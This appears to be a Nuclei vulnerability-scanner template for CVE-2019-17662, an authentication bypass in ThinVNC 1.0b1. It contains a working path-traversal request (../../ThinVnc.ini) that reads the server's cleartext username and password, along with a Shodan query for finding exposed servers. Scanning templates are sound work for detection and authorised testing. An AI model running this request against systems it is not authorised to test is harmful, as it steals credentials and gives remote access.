id: CVE-2019-17662 info: name: ThinVNC 1.0b1 - Authentication Bypass author: DhiyaneshDK severity: critical description: | ThinVNC 1.0b1 is vulnerable to arbitrary file read, which leads to a compromise of the VNC server. The vulnerability exists even when authentication is turned on during the deployment of the VNC server. The password for authentication is stored in cleartext in a file that can be read via a ../../ThinVnc.ini directory traversal attack vector. impact: | An attacker can bypass authentication and gain unauthorized access to the ThinVNC application. remediation: | Upgrade to a patched version of ThinVNC or implement additional authentication mechanisms. reference: - http://packetstormsecurity.com/files/154896/ThinVNC-1.0b1-Authentication-Bypass.html - https://github.com/bewest/thinvnc/issues/5 - https://redteamzone.com/ThinVNC/ - https://github.com/shashankmangal2/Exploits/blob/master/ThinVNC-RemoteAccess/POC.py - https://github.com/YIXINSHUWU/Penetration_Testing_POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-17662 cwe-id: CWE-22 epss-score: 0.68973 epss-percentile: 0.97707 cpe: cpe:2.3:a:cybelsoft:thinvnc:1.0:b1:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: cybelsoft product: thinvnc shodan-query: http.favicon.hash:-1414548363 tags: cve,cve2019,packetstorm,auth-bypass,thinvnc,intrusive,cybelsoft http: - raw: - | GET /{{randstr}}/../../ThinVnc.ini HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body words: - "User=" - "Password=" condition: and - type: word part: header words: - "application/binary" - type: status status: - 200 # digest: 4b0a00483046022100a2d2bfd77c6df251e51f2a32a67da9013eb27be31b3497fdffbe27b4b9f86c91022100f32abcda610d82eba43442f13bdbc2e0eca61d37d67d25a971ba1faf54ca3218:922c64590222798bb761d5b6d8e72950